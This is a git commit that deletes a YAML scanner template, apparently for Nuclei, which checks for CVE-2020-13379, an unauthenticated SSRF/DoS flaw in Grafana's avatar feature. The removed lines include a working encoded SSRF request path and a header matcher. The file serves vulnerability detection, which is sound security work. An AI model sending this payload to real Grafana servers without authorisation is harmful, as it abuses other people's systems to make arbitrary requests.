Delete CVE-2020-13379.yaml

2020-09-28 07:27:02 +05:30 · 2020-09-28 07:27:02 +05:30 · 13a3ee21f2
parent 2f7c40d80d
commit 13a3ee21f2
1 changed files with 0 additions and 18 deletions
--- a/cves/CVE-2020-13379.yaml
+++ b/cves/CVE-2020-13379.yaml
@ -1,18 +0,0 @@
-id: CVE-2020-13379
-# https://grafana.com/blog/2020/06/03/grafana-6.7.4-and-7.0.2-released-with-important-security-fix/
-# https://rhynorater.github.io/CVE-2020-13379-Write-Up
-info:
-  name: Unauthenticated Grafana DoS
-  author: joeldeleep
-  severity: medium
-  description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client. 
-  
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/avatar/test%3fd%3dredirect.example.com%25253f%253b%252fbp.blogspot.com%252f
-    matchers:
-      - type: word
-        words:
-          - "image/jpeg"
-        part: header